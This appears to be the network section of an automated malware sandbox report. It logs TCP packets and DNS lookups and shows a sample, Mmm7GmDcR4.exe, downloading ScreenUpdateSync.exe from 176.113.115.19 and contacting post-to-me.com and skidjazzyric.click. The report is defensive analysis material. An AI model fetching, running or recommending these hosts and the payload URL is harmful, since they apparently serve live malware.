                                                                                              Jan 10, 2025 16:09:29.554677963 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.554790974 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.554790974 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.554915905 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.554929018 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.554941893 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.554984093 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.554984093 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555130959 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555144072 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555155039 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555166960 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555181026 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555191994 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555205107 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555216074 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555227041 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555236101 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555277109 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555277109 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555310965 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555329084 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555361032 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555372953 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555380106 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555388927 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555428028 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555491924 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555525064 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555536985 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555547953 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555558920 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555573940 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555615902 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555620909 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555684090 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555711031 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555723906 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555757999 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555768967 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555773020 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555773020 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555780888 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555794954 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555809975 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555895090 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.555932045 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.555943966 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556000948 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.556181908 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556195021 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556206942 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556216955 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556229115 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556262970 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.556262970 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.556332111 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.556377888 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556391001 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556401968 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556412935 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556423903 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556436062 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556456089 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.556502104 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.556534052 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556545973 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556557894 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556570053 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556576014 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.556582928 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556590080 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556596041 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556632042 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.556672096 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.556757927 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556811094 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.556833982 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.556859016 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.556977034 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557064056 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557075977 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557105064 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.557105064 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.557133913 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557147026 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557157993 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557190895 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.557252884 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.557260036 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557271957 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557284117 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557295084 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557306051 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557317019 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557348013 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.557348013 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.557414055 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.557439089 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.557642937 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.559817076 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.559830904 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.559843063 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.559854031 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.559865952 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.559876919 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.559887886 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.559897900 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.559899092 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.559914112 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.559927940 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.559976101 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.559994936 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560012102 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560043097 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.560065031 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560077906 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560090065 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560100079 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560111046 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560111046 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.560123920 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560134888 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560142040 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560172081 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.560208082 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.560405016 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560422897 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560436010 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560446978 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560482979 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.560516119 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560528040 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560539007 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560559988 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.560683966 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.560723066 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560736895 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560749054 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560760021 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.560832977 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.560847998 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.582592010 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.582607031 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.582617998 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.582629919 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:29.582667112 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.582694054 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:31.382060051 CET49756443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:31.382163048 CET44349756104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:31.382251978 CET49756443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:31.383372068 CET49756443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:31.383399010 CET44349756104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:31.848078966 CET44349756104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:31.848294973 CET49756443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:31.849817991 CET49756443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:31.849828959 CET44349756104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:31.850111008 CET44349756104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:31.889549017 CET49756443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:31.895068884 CET49756443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:31.895102978 CET49756443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:31.895245075 CET44349756104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:32.321947098 CET44349756104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:32.322033882 CET44349756104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:32.322215080 CET49756443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:32.335952997 CET49756443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:32.335968018 CET44349756104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:32.381745100 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:32.381799936 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:32.381990910 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:32.382353067 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:32.382374048 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:32.842710018 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:32.842825890 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:32.893497944 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:32.893533945 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:32.893942118 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:32.908425093 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:32.908458948 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:32.908535004 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.372683048 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.372747898 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.372781992 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.372808933 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.372826099 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.372840881 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.372903109 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.372908115 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.372919083 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.372946978 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.373016119 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.373121023 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.373136044 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.373373985 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.373755932 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.373764038 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.377748013 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.377785921 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.377819061 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.377829075 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.377876997 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.459131002 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.459456921 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.459517956 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.459533930 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.459561110 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.459649086 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.459666967 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.459790945 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.459858894 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.460005045 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.460021973 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.460031986 CET49762443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.460036993 CET44349762104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.678148985 CET49768443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.678179026 CET44349768104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:33.678282976 CET49768443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.678675890 CET49768443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:33.678693056 CET44349768104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:34.172840118 CET44349768104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:34.173218966 CET49768443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:34.174308062 CET49768443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:34.174329996 CET44349768104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:34.174869061 CET44349768104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:34.176362991 CET49768443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:34.176533937 CET49768443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:34.176570892 CET44349768104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:34.313133001 CET8049735176.113.115.19192.168.2.9
                                                                                              Jan 10, 2025 16:09:34.313247919 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:09:35.201386929 CET44349768104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:35.201632977 CET44349768104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:35.201766968 CET49768443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:35.201934099 CET49768443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:35.201951027 CET44349768104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:35.772018909 CET49776443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:35.772068977 CET44349776104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:35.772202969 CET49776443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:35.772531986 CET49776443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:35.772552013 CET44349776104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:36.271955967 CET44349776104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:36.272078991 CET49776443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:36.273905039 CET49776443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:36.273916960 CET44349776104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:36.274256945 CET44349776104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:36.275971889 CET49776443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:36.276093006 CET49776443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:36.276129961 CET44349776104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:36.276197910 CET49776443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:36.319329023 CET44349776104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:36.819662094 CET44349776104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:36.819771051 CET44349776104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:36.819921017 CET49776443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:36.820097923 CET49776443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:36.820122957 CET44349776104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:37.291349888 CET49784443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:37.291388035 CET44349784104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:37.291508913 CET49784443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:37.291793108 CET49784443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:37.291802883 CET44349784104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:38.795176983 CET44349784104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:38.795248985 CET49784443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:38.798124075 CET49784443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:38.798130989 CET44349784104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:38.798378944 CET44349784104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:38.800112963 CET49784443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:38.800306082 CET49784443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:38.800333977 CET44349784104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:38.800414085 CET49784443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:38.800420046 CET44349784104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:42.111295938 CET44349784104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:42.111462116 CET44349784104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:42.111524105 CET49784443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:42.186357975 CET49784443192.168.2.9104.21.32.1
                                                                                              Jan 10, 2025 16:09:42.186383009 CET44349784104.21.32.1192.168.2.9
                                                                                              Jan 10, 2025 16:11:16.998924017 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:11:17.311144114 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:11:17.920479059 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:11:19.123575926 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:11:21.529854059 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:11:26.343935966 CET4973580192.168.2.9176.113.115.19
                                                                                              Jan 10, 2025 16:11:35.952924013 CET4973580192.168.2.9176.113.115.19
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 10, 2025 16:09:27.034674883 CET6055853192.168.2.91.1.1.1
                                                                                              Jan 10, 2025 16:09:27.071239948 CET53605581.1.1.1192.168.2.9
                                                                                              Jan 10, 2025 16:09:31.364967108 CET6321853192.168.2.91.1.1.1
                                                                                              Jan 10, 2025 16:09:31.376218081 CET53632181.1.1.1192.168.2.9
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Jan 10, 2025 16:09:27.034674883 CET192.168.2.91.1.1.10x9f01Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                              Jan 10, 2025 16:09:31.364967108 CET192.168.2.91.1.1.10x8747Standard query (0)skidjazzyric.clickA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Jan 10, 2025 16:09:22.969747066 CET1.1.1.1192.168.2.90xd44eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Jan 10, 2025 16:09:22.969747066 CET1.1.1.1192.168.2.90xd44eNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                              Jan 10, 2025 16:09:27.071239948 CET1.1.1.1192.168.2.90x9f01No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                              Jan 10, 2025 16:09:27.071239948 CET1.1.1.1192.168.2.90x9f01No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                              Jan 10, 2025 16:09:31.376218081 CET1.1.1.1192.168.2.90x8747No error (0)skidjazzyric.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                              Jan 10, 2025 16:09:31.376218081 CET1.1.1.1192.168.2.90x8747No error (0)skidjazzyric.click104.21.64.1A (IP address)IN (0x0001)false
                                                                                              Jan 10, 2025 16:09:31.376218081 CET1.1.1.1192.168.2.90x8747No error (0)skidjazzyric.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                              Jan 10, 2025 16:09:31.376218081 CET1.1.1.1192.168.2.90x8747No error (0)skidjazzyric.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                              Jan 10, 2025 16:09:31.376218081 CET1.1.1.1192.168.2.90x8747No error (0)skidjazzyric.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                              Jan 10, 2025 16:09:31.376218081 CET1.1.1.1192.168.2.90x8747No error (0)skidjazzyric.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                              Jan 10, 2025 16:09:31.376218081 CET1.1.1.1192.168.2.90x8747No error (0)skidjazzyric.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                              • post-to-me.com
                                                                                              • skidjazzyric.click
                                                                                              • 176.113.115.19
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.949735176.113.115.19807508C:\Users\user\Desktop\Mmm7GmDcR4.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Jan 10, 2025 16:09:28.360161066 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                              User-Agent: ShareScreen
                                                                                              Host: 176.113.115.19
                                                                                              Jan 10, 2025 16:09:29.068845034 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 10 Jan 2025 15:09:28 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 10 Jan 2025 15:00:01 GMT
                                                                                              ETag: "51600-62b5b59615dc3"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 333312
                                                                                              Content-Type: application/x-msdos-program
